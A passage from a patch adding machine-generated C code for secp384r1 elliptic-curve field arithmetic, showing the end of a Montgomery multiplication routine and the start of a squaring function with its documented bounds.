uint64_t x456; ++ fiat_secp384r1_uint1 x457; ++ uint64_t x458; ++ fiat_secp384r1_uint1 x459; ++ uint64_t x460; ++ fiat_secp384r1_uint1 x461; ++ uint64_t x462; ++ fiat_secp384r1_uint1 x463; ++ uint64_t x464; ++ fiat_secp384r1_uint1 x465; ++ uint64_t x466; ++ fiat_secp384r1_uint1 x467; ++ uint64_t x468; ++ uint64_t x469; ++ uint64_t x470; ++ uint64_t x471; ++ uint64_t x472; ++ uint64_t x473; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[0]); ++ fiat_secp384r1_mulx_u64(&x7, &x8, x6, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x9, &x10, x6, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x11, &x12, x6, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x13, &x14, x6, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x15, &x16, x6, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x17, &x18, x6, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x19, &x20, 0x0, x18, x15); ++ fiat_secp384r1_addcarryx_u64(&x21, &x22, x20, x16, x13); ++ fiat_secp384r1_addcarryx_u64(&x23, &x24, x22, x14, x11); ++ fiat_secp384r1_addcarryx_u64(&x25, &x26, x24, x12, x9); ++ fiat_secp384r1_addcarryx_u64(&x27, &x28, x26, x10, x7); ++ x29 = (x28 + x8); ++ fiat_secp384r1_mulx_u64(&x30, &x31, x17, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x32, &x33, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x34, &x35, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x36, &x37, x30, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x38, &x39, x30, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x40, &x41, x30, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x42, &x43, x30, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x44, &x45, 0x0, x43, x40); ++ fiat_secp384r1_addcarryx_u64(&x46, &x47, x45, x41, x38); ++ fiat_secp384r1_addcarryx_u64(&x48, &x49, x47, x39, x36); ++ fiat_secp384r1_addcarryx_u64(&x50, &x51, x49, x37, x34); ++ fiat_secp384r1_addcarryx_u64(&x52, &x53, x51, x35, x32); ++ x54 = (x53 + x33); ++ fiat_secp384r1_addcarryx_u64(&x55, &x56, 0x0, x17, x42); ++ fiat_secp384r1_addcarryx_u64(&x57, &x58, x56, x19, x44); ++ fiat_secp384r1_addcarryx_u64(&x59, &x60, x58, x21, x46); ++ fiat_secp384r1_addcarryx_u64(&x61, &x62, x60, x23, x48); ++ fiat_secp384r1_addcarryx_u64(&x63, &x64, x62, x25, x50); ++ fiat_secp384r1_addcarryx_u64(&x65, &x66, x64, x27, x52); ++ fiat_secp384r1_addcarryx_u64(&x67, &x68, x66, x29, x54); ++ fiat_secp384r1_mulx_u64(&x69, &x70, x1, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x71, &x72, x1, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x73, &x74, x1, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x75, &x76, x1, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x77, &x78, x1, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x79, &x80, x1, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x81, &x82, 0x0, x80, x77); ++ fiat_secp384r1_addcarryx_u64(&x83, &x84, x82, x78, x75); ++ fiat_secp384r1_addcarryx_u64(&x85, &x86, x84, x76, x73); ++ fiat_secp384r1_addcarryx_u64(&x87, &x88, x86, x74, x71); ++ fiat_secp384r1_addcarryx_u64(&x89, &x90, x88, x72, x69); ++ x91 = (x90 + x70); ++ fiat_secp384r1_addcarryx_u64(&x92, &x93, 0x0, x57, x79); ++ fiat_secp384r1_addcarryx_u64(&x94, &x95, x93, x59, x81); ++ fiat_secp384r1_addcarryx_u64(&x96, &x97, x95, x61, x83); ++ fiat_secp384r1_addcarryx_u64(&x98, &x99, x97, x63, x85); ++ fiat_secp384r1_addcarryx_u64(&x100, &x101, x99, x65, x87); ++ fiat_secp384r1_addcarryx_u64(&x102, &x103, x101, x67, x89); ++ fiat_secp384r1_addcarryx_u64(&x104, &x105, x103, x68, x91); ++ fiat_secp384r1_mulx_u64(&x106, &x107, x92, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x108, &x109, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x110, &x111, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x112, &x113, x106, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x114, &x115, x106, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x116, &x117, x106, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x118, &x119, x106, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x120, &x121, 0x0, x119, x116); ++ fiat_secp384r1_addcarryx_u64(&x122, &x123, x121, x117, x114); ++ fiat_secp384r1_addcarryx_u64(&x124, &x125, x123, x115, x112); ++ fiat_secp384r1_addcarryx_u64(&x126, &x127, x125, x113, x110); ++ fiat_secp384r1_addcarryx_u64(&x128, &x129, x127, x111, x108); ++ x130 = (x129 + x109); ++ fiat_secp384r1_addcarryx_u64(&x131, &x132, 0x0, x92, x118); ++ fiat_secp384r1_addcarryx_u64(&x133, &x134, x132, x94, x120); ++ fiat_secp384r1_addcarryx_u64(&x135, &x136, x134, x96, x122); ++ fiat_secp384r1_addcarryx_u64(&x137, &x138, x136, x98, x124); ++ fiat_secp384r1_addcarryx_u64(&x139, &x140, x138, x100, x126); ++ fiat_secp384r1_addcarryx_u64(&x141, &x142, x140, x102, x128); ++ fiat_secp384r1_addcarryx_u64(&x143, &x144, x142, x104, x130); ++ x145 = ((uint64_t)x144 + x105); ++ fiat_secp384r1_mulx_u64(&x146, &x147, x2, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x148, &x149, x2, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x150, &x151, x2, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x152, &x153, x2, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x154, &x155, x2, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x156, &x157, x2, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x158, &x159, 0x0, x157, x154); ++ fiat_secp384r1_addcarryx_u64(&x160, &x161, x159, x155, x152); ++ fiat_secp384r1_addcarryx_u64(&x162, &x163, x161, x153, x150); ++ fiat_secp384r1_addcarryx_u64(&x164, &x165, x163, x151, x148); ++ fiat_secp384r1_addcarryx_u64(&x166, &x167, x165, x149, x146); ++ x168 = (x167 + x147); ++ fiat_secp384r1_addcarryx_u64(&x169, &x170, 0x0, x133, x156); ++ fiat_secp384r1_addcarryx_u64(&x171, &x172, x170, x135, x158); ++ fiat_secp384r1_addcarryx_u64(&x173, &x174, x172, x137, x160); ++ fiat_secp384r1_addcarryx_u64(&x175, &x176, x174, x139, x162); ++ fiat_secp384r1_addcarryx_u64(&x177, &x178, x176, x141, x164); ++ fiat_secp384r1_addcarryx_u64(&x179, &x180, x178, x143, x166); ++ fiat_secp384r1_addcarryx_u64(&x181, &x182, x180, x145, x168); ++ fiat_secp384r1_mulx_u64(&x183, &x184, x169, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x185, &x186, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x187, &x188, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x189, &x190, x183, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x191, &x192, x183, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x193, &x194, x183, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x195, &x196, x183, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x197, &x198, 0x0, x196, x193); ++ fiat_secp384r1_addcarryx_u64(&x199, &x200, x198, x194, x191); ++ fiat_secp384r1_addcarryx_u64(&x201, &x202, x200, x192, x189); ++ fiat_secp384r1_addcarryx_u64(&x203, &x204, x202, x190, x187); ++ fiat_secp384r1_addcarryx_u64(&x205, &x206, x204, x188, x185); ++ x207 = (x206 + x186); ++ fiat_secp384r1_addcarryx_u64(&x208, &x209, 0x0, x169, x195); ++ fiat_secp384r1_addcarryx_u64(&x210, &x211, x209, x171, x197); ++ fiat_secp384r1_addcarryx_u64(&x212, &x213, x211, x173, x199); ++ fiat_secp384r1_addcarryx_u64(&x214, &x215, x213, x175, x201); ++ fiat_secp384r1_addcarryx_u64(&x216, &x217, x215, x177, x203); ++ fiat_secp384r1_addcarryx_u64(&x218, &x219, x217, x179, x205); ++ fiat_secp384r1_addcarryx_u64(&x220, &x221, x219, x181, x207); ++ x222 = ((uint64_t)x221 + x182); ++ fiat_secp384r1_mulx_u64(&x223, &x224, x3, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x225, &x226, x3, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x227, &x228, x3, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x229, &x230, x3, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x231, &x232, x3, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x233, &x234, x3, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x235, &x236, 0x0, x234, x231); ++ fiat_secp384r1_addcarryx_u64(&x237, &x238, x236, x232, x229); ++ fiat_secp384r1_addcarryx_u64(&x239, &x240, x238, x230, x227); ++ fiat_secp384r1_addcarryx_u64(&x241, &x242, x240, x228, x225); ++ fiat_secp384r1_addcarryx_u64(&x243, &x244, x242, x226, x223); ++ x245 = (x244 + x224); ++ fiat_secp384r1_addcarryx_u64(&x246, &x247, 0x0, x210, x233); ++ fiat_secp384r1_addcarryx_u64(&x248, &x249, x247, x212, x235); ++ fiat_secp384r1_addcarryx_u64(&x250, &x251, x249, x214, x237); ++ fiat_secp384r1_addcarryx_u64(&x252, &x253, x251, x216, x239); ++ fiat_secp384r1_addcarryx_u64(&x254, &x255, x253, x218, x241); ++ fiat_secp384r1_addcarryx_u64(&x256, &x257, x255, x220, x243); ++ fiat_secp384r1_addcarryx_u64(&x258, &x259, x257, x222, x245); ++ fiat_secp384r1_mulx_u64(&x260, &x261, x246, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x262, &x263, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x264, &x265, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x266, &x267, x260, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x268, &x269, x260, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x270, &x271, x260, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x272, &x273, x260, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x274, &x275, 0x0, x273, x270); ++ fiat_secp384r1_addcarryx_u64(&x276, &x277, x275, x271, x268); ++ fiat_secp384r1_addcarryx_u64(&x278, &x279, x277, x269, x266); ++ fiat_secp384r1_addcarryx_u64(&x280, &x281, x279, x267, x264); ++ fiat_secp384r1_addcarryx_u64(&x282, &x283, x281, x265, x262); ++ x284 = (x283 + x263); ++ fiat_secp384r1_addcarryx_u64(&x285, &x286, 0x0, x246, x272); ++ fiat_secp384r1_addcarryx_u64(&x287, &x288, x286, x248, x274); ++ fiat_secp384r1_addcarryx_u64(&x289, &x290, x288, x250, x276); ++ fiat_secp384r1_addcarryx_u64(&x291, &x292, x290, x252, x278); ++ fiat_secp384r1_addcarryx_u64(&x293, &x294, x292, x254, x280); ++ fiat_secp384r1_addcarryx_u64(&x295, &x296, x294, x256, x282); ++ fiat_secp384r1_addcarryx_u64(&x297, &x298, x296, x258, x284); ++ x299 = ((uint64_t)x298 + x259); ++ fiat_secp384r1_mulx_u64(&x300, &x301, x4, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x302, &x303, x4, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x304, &x305, x4, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x306, &x307, x4, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x308, &x309, x4, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x310, &x311, x4, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x312, &x313, 0x0, x311, x308); ++ fiat_secp384r1_addcarryx_u64(&x314, &x315, x313, x309, x306); ++ fiat_secp384r1_addcarryx_u64(&x316, &x317, x315, x307, x304); ++ fiat_secp384r1_addcarryx_u64(&x318, &x319, x317, x305, x302); ++ fiat_secp384r1_addcarryx_u64(&x320, &x321, x319, x303, x300); ++ x322 = (x321 + x301); ++ fiat_secp384r1_addcarryx_u64(&x323, &x324, 0x0, x287, x310); ++ fiat_secp384r1_addcarryx_u64(&x325, &x326, x324, x289, x312); ++ fiat_secp384r1_addcarryx_u64(&x327, &x328, x326, x291, x314); ++ fiat_secp384r1_addcarryx_u64(&x329, &x330, x328, x293, x316); ++ fiat_secp384r1_addcarryx_u64(&x331, &x332, x330, x295, x318); ++ fiat_secp384r1_addcarryx_u64(&x333, &x334, x332, x297, x320); ++ fiat_secp384r1_addcarryx_u64(&x335, &x336, x334, x299, x322); ++ fiat_secp384r1_mulx_u64(&x337, &x338, x323, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x339, &x340, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x341, &x342, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x343, &x344, x337, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x345, &x346, x337, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x347, &x348, x337, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x349, &x350, x337, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x351, &x352, 0x0, x350, x347); ++ fiat_secp384r1_addcarryx_u64(&x353, &x354, x352, x348, x345); ++ fiat_secp384r1_addcarryx_u64(&x355, &x356, x354, x346, x343); ++ fiat_secp384r1_addcarryx_u64(&x357, &x358, x356, x344, x341); ++ fiat_secp384r1_addcarryx_u64(&x359, &x360, x358, x342, x339); ++ x361 = (x360 + x340); ++ fiat_secp384r1_addcarryx_u64(&x362, &x363, 0x0, x323, x349); ++ fiat_secp384r1_addcarryx_u64(&x364, &x365, x363, x325, x351); ++ fiat_secp384r1_addcarryx_u64(&x366, &x367, x365, x327, x353); ++ fiat_secp384r1_addcarryx_u64(&x368, &x369, x367, x329, x355); ++ fiat_secp384r1_addcarryx_u64(&x370, &x371, x369, x331, x357); ++ fiat_secp384r1_addcarryx_u64(&x372, &x373, x371, x333, x359); ++ fiat_secp384r1_addcarryx_u64(&x374, &x375, x373, x335, x361); ++ x376 = ((uint64_t)x375 + x336); ++ fiat_secp384r1_mulx_u64(&x377, &x378, x5, (arg2[5])); ++ fiat_secp384r1_mulx_u64(&x379, &x380, x5, (arg2[4])); ++ fiat_secp384r1_mulx_u64(&x381, &x382, x5, (arg2[3])); ++ fiat_secp384r1_mulx_u64(&x383, &x384, x5, (arg2[2])); ++ fiat_secp384r1_mulx_u64(&x385, &x386, x5, (arg2[1])); ++ fiat_secp384r1_mulx_u64(&x387, &x388, x5, (arg2[0])); ++ fiat_secp384r1_addcarryx_u64(&x389, &x390, 0x0, x388, x385); ++ fiat_secp384r1_addcarryx_u64(&x391, &x392, x390, x386, x383); ++ fiat_secp384r1_addcarryx_u64(&x393, &x394, x392, x384, x381); ++ fiat_secp384r1_addcarryx_u64(&x395, &x396, x394, x382, x379); ++ fiat_secp384r1_addcarryx_u64(&x397, &x398, x396, x380, x377); ++ x399 = (x398 + x378); ++ fiat_secp384r1_addcarryx_u64(&x400, &x401, 0x0, x364, x387); ++ fiat_secp384r1_addcarryx_u64(&x402, &x403, x401, x366, x389); ++ fiat_secp384r1_addcarryx_u64(&x404, &x405, x403, x368, x391); ++ fiat_secp384r1_addcarryx_u64(&x406, &x407, x405, x370, x393); ++ fiat_secp384r1_addcarryx_u64(&x408, &x409, x407, x372, x395); ++ fiat_secp384r1_addcarryx_u64(&x410, &x411, x409, x374, x397); ++ fiat_secp384r1_addcarryx_u64(&x412, &x413, x411, x376, x399); ++ fiat_secp384r1_mulx_u64(&x414, &x415, x400, UINT64_C(0x100000001)); ++ fiat_secp384r1_mulx_u64(&x416, &x417, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x418, &x419, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x420, &x421, x414, UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_mulx_u64(&x422, &x423, x414, UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_mulx_u64(&x424, &x425, x414, UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_mulx_u64(&x426, &x427, x414, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u64(&x428, &x429, 0x0, x427, x424); ++ fiat_secp384r1_addcarryx_u64(&x430, &x431, x429, x425, x422); ++ fiat_secp384r1_addcarryx_u64(&x432, &x433, x431, x423, x420); ++ fiat_secp384r1_addcarryx_u64(&x434, &x435, x433, x421, x418); ++ fiat_secp384r1_addcarryx_u64(&x436, &x437, x435, x419, x416); ++ x438 = (x437 + x417); ++ fiat_secp384r1_addcarryx_u64(&x439, &x440, 0x0, x400, x426); ++ fiat_secp384r1_addcarryx_u64(&x441, &x442, x440, x402, x428); ++ fiat_secp384r1_addcarryx_u64(&x443, &x444, x442, x404, x430); ++ fiat_secp384r1_addcarryx_u64(&x445, &x446, x444, x406, x432); ++ fiat_secp384r1_addcarryx_u64(&x447, &x448, x446, x408, x434); ++ fiat_secp384r1_addcarryx_u64(&x449, &x450, x448, x410, x436); ++ fiat_secp384r1_addcarryx_u64(&x451, &x452, x450, x412, x438); ++ x453 = ((uint64_t)x452 + x413); ++ fiat_secp384r1_subborrowx_u64(&x454, &x455, 0x0, x441, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x456, &x457, x455, x443, ++ UINT64_C(0xffffffff00000000)); ++ fiat_secp384r1_subborrowx_u64(&x458, &x459, x457, x445, ++ UINT64_C(0xfffffffffffffffe)); ++ fiat_secp384r1_subborrowx_u64(&x460, &x461, x459, x447, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x462, &x463, x461, x449, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x464, &x465, x463, x451, ++ UINT64_C(0xffffffffffffffff)); ++ fiat_secp384r1_subborrowx_u64(&x466, &x467, x465, x453, 0x0); ++ fiat_secp384r1_cmovznz_u64(&x468, x467, x454, x441); ++ fiat_secp384r1_cmovznz_u64(&x469, x467, x456, x443); ++ fiat_secp384r1_cmovznz_u64(&x470, x467, x458, x445); ++ fiat_secp384r1_cmovznz_u64(&x471, x467, x460, x447); ++ fiat_secp384r1_cmovznz_u64(&x472, x467, x462, x449); ++ fiat_secp384r1_cmovznz_u64(&x473, x467, x464, x451); ++ out1[0] = x468; ++ out1[1] = x469; ++ out1[2] = x470; ++ out1[3] = x471; ++ out1[4] = x472; ++ out1[5] = x473; ++} ++ ++/* ++ * The function fiat_secp384r1_square squares a field element in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) * eval (from_montgomery arg1)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_square(uint64_t out1[6], const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint64_t x8; ++ uint64_t x9; ++ uint64_t x10; ++ uint64_t x11; ++ uint64_t x12; ++ uint64_t x13; ++ uint64_t x14; ++ uint64_t x15; ++ uint64_t x16; ++ uint64_t x17; ++ uint64_t x18; ++ uint64_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint64_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint64_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint64_t x25; ++ fiat_secp384r1_uint1 x26; ++ uint64_t x27; ++ fiat_secp384r1_uint1 x28; ++ uint64_t x29; ++ uint64_t x30; ++ uint64_t x31; ++ uint64_t x32; ++ uint64_t x33; ++ uint64_t x34; ++ uint64_t x35; ++ uint64_t x36; ++ uint64_t x37; ++ uint64_t x38; ++ uint64_t x39; ++ uint64_t x40; ++ uint64_t x41; ++ uint64_t x42; ++ uint64_t x43; ++ uint64_t x44; ++ fiat_secp384r1_uint1 x45; ++ uint64_t x46; ++ fiat_secp384r1_uint1 x47; ++ uint64_t x48; ++ fiat_secp384r1_uint1 x49; ++ uint64_t x50; ++ fiat_secp384r1_uint1 x51; ++ uint64_t x52; ++ fiat_secp384r1_uint1 x53; ++ uint64_t x54; ++ uint64_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint64_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint64_t x59; ++ fiat_secp384r1_uint1 x60; ++ uint64_t x61; ++ fiat_secp384r1_uint1 x62; ++ uint64_t x63; ++ fiat_secp384r1_uint1 x64; ++ uint64_t x65; ++ fiat_secp384r1_uint1 x66; ++ uint64_t x67; ++ fiat_secp384r1_uint1 x68; ++ uint64_t x69; ++ uint64_t x70; ++ uint64_t x71; ++ uint64_t x72; ++ uint64_t x73; ++ uint64_t x74; ++ uint64_t x75; ++ uint64_t x76; ++ uint64_t x77; ++ uint64_t x78; ++ uint64_t x79; ++ uint64_t x80; ++ uint64_t x81; ++ fiat_secp384r1_uint1 x82; ++ uint64_t x83; ++ fiat_secp384r1_uint1 x84; ++ uint64_t x85; ++ fiat_secp384r1_uint1 x86; ++ uint64_t x87; ++ fiat_secp384r1_uint1 x88; ++ uint64_t x89; ++ fiat_secp384r1_uint1 x90; ++ uint64_t x91; ++ uint64_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint64_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint64_t x96; ++ fiat_secp384r1_uint1 x97; ++ uint64_t x98; ++ fiat_secp384r1_uint1 x99; ++ uint64_t x100; ++ fiat_secp384r1_uint1 x101; ++ uint64_t x102; ++ fiat_secp384r1_uint1 x103; ++ uint64_t x104; ++ fiat_secp384r1_uint1 x105; ++ uint64_t x106; ++ uint64_t x107; ++ uint64_t x108; ++ uint64_t x109; ++ uint64_t x110; ++ uint64_t x111; ++ uint64_t x112; ++ uint64_t x113; ++ uint64_t x114; ++ uint64_t x115; ++ uint64_t x116; ++ uint64_t x117; ++ uint64_t x118; ++ uint64_t x119; ++ uint64_t x120; ++ fiat_secp384r1_uint1 x121; ++ uint64_t x122; ++ fiat_secp384r1_uint1 x123; ++ uint64_t x124; ++ fiat_secp384r1_uint1 x125; ++ uint64_t x126; ++ fiat_secp384r1_uint1 x127; ++ uint64_t x128; ++ fiat_secp384r1_uint1 x129; ++ uint64_t x130; ++ uint64_t x131; ++ fiat_secp384r1_uint1 x132; ++ uint64_t x133; ++ fiat_secp384r1_uint1 x134; ++ uint64_t x135; ++ fiat_secp384r1_uint1 x136; ++ uint64_t x137; ++ fiat_secp384r1_uint1 x138; ++ uint64_t x139; ++ fiat_secp384r1_uint1 x140; ++ uint64_t x141; ++ fiat_secp384r1_uint1 x142; ++ uint64_t x143; ++ fiat_secp384r1_uint1 x144; ++ uint64_t x145; ++ uint64_t x146; ++ uint64_t x147; ++ uint64_t x148; ++ uint64_t x149; ++ uint64_t x150; ++ uint64_t x151; ++ uint64_t x152; ++ uint64_t x153; ++ uint64_t x154; ++ uint64_t x155; ++ uint64_t x156; ++ uint64_t x157; ++ uint64_t x158; ++ fiat_secp384r1_uint1 x159; ++ uint64_t x160; ++ fiat_secp384r1_uint1 x161; ++ uint64_t x162; ++ fiat_secp384r1_uint1 x163; ++ uint64_t x164; ++ fiat_secp384r1_uint1 x165; ++ uint64_t x166; ++ fiat_secp384r1_uint1 x167; ++ uint64_t x168; ++ uint64_t x169; ++ fiat_secp384r1_uint1 x170; ++ uint64_t x171; ++ fiat_secp384r1_uint1 x172; ++ uint64_t x173; ++ fiat_secp384r1_uint1 x174; ++ uint64_t x175; ++ fiat_secp384r1_uint1 x176; ++ uint64_t x177; ++ fiat_secp384r1_uint1 x178; ++ uint64_t x179; ++ fiat_secp384r1_uint1 x180; ++ uint64_t x181; ++ fiat_secp384r1_uint1 x182; ++ uint64_t x183; ++ uint64_t x184; ++ uint64_t x185; ++ uint64_t x186; ++ uint64_t x187; ++ uint64_t x188; ++ uint64_t x189; ++ uint64_t x190; ++ uint64_t x191; ++ uint64_t x192; ++ uint64_t x193; ++ uint64_t x194; ++ uint64_t x195; ++ uint64_t x196; ++ uint64_t x197; ++ fiat_secp384r1_uint1 x198; ++ uint64_t x199; ++ fiat_secp384r1_uint1 x200; ++ uint64_t x201; ++ fiat_secp384r1_uint1 x202; ++ uint64_t x203; ++ fiat_secp384r1_uint1 x204; ++ uint64_t x205; ++ fiat_secp384r1_uint1 x206; ++ uint64_t x207; ++ uint64_t x208; ++ fiat_secp384r1_uint1 x209; ++ uint64_t x210; ++ fiat_secp384r1_uint1 x211; ++ uint64_t x212; ++ fiat_secp384r1_uint1 x213; ++ uint64_t x214; ++ fiat_secp384r1_uint1 x215; ++ uint64_t x216; ++ fiat_secp384r1_uint1 x217; ++ uint64_t x218; ++ fiat_secp384r1_uint1 x219; ++ uint64_t x220; ++ fiat_secp384r1_uint1 x221; ++ uint64_t x222; ++ uint64_t x223; ++ uint64_t x224; ++ uint64_t x225; ++ uint64_t x226; ++ uint64_t x227; ++ uint64_t x228; ++ uint64_t x229; ++ uint64_t x230; ++ uint64_t x231; ++ uint64_t x232; ++ uint64_t x233; ++ uint64_t x234; ++ uint64_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint64_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint64_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint64_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint64_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint64_t x245; ++ uint64_t x246; ++ fiat_secp384r1_uint1 x247; ++ uint64_t x248; ++ fiat_secp384r1_uint1 x249; ++ uint64_t x250; ++ fiat_secp384r1_uint1 x251; ++ uint64_t x252; ++ fiat_secp384r1_uint1 x253; ++ uint64_t x254; ++ fiat_secp384r1_uint1 x255; ++ uint64_t x256; ++ fiat_secp384r1_uint1 x257; ++ uint64_t x258; ++ fiat_secp384r1_uint1 x259; ++ uint64_t x260; ++ uint64_t x261; ++ uint64_t x262; ++ uint64_t x263; ++ uint64_t x264; ++ uint64_t x265; ++ uint64_t x266; ++ uint64_t x267; ++ uint64_t x268; ++ uint64_t x269; ++ uint64_t x270; ++ uint64_t x271; ++ uint64_t x272; ++ uint64_t x273; ++ uint64_t x274; ++ fiat_secp384r1_uint1 x275; ++ uint64_t x276; ++ fiat_secp384r1_uint1 x277; ++ uint64_t x278; ++ fiat_secp384r1_uint1 x279; ++ uint64_t x280; ++ fiat_secp384r1_uint1 x281; ++ uint64_t x282; ++ fiat_secp384r1_uint1 x283; ++ uint64_t x284; ++ uint64_t x285; ++ fiat_secp384r1_uint1 x286; ++ uint64_t x287; ++ fiat_secp384r1_uint1 x288; ++ uint64_t x289; ++ fiat_secp384r1_uint1 x290; ++ uint64_t x291; ++ fiat_secp384r1_uint1 x292; ++ uint64_t x293; ++ fiat_secp384r1_uint1 x294; ++ uint64_t x295; ++ fiat_secp384r1_uint1 x296; ++ uint64_t x297; ++ fiat_secp384r1_uint1 x298; ++ uint64_t x299; ++ uint64_t x300; ++ uint64_t x301; ++ uint64_t x302; ++ uint64_t x303; ++ uint64_t x304; ++ uint64_t x305; ++ uint64_t x306; ++ uint64_t x307; ++ uint64_t x308; ++ uint64_t x309; ++ uint64_t x310; ++ uint64_t x311; ++ uint64_t x312; ++ fiat_secp384r1_uint1 x313; ++ uint64_t x314; ++ fiat_secp384r1_uint1 x315; ++ uint64_t x316; ++ fiat_secp384r1_uint1 x317; ++ uint64_t x318; ++ fiat_secp384r1_uint1 x319; ++ uint64_t x320; ++ fiat_secp384r1_uint1 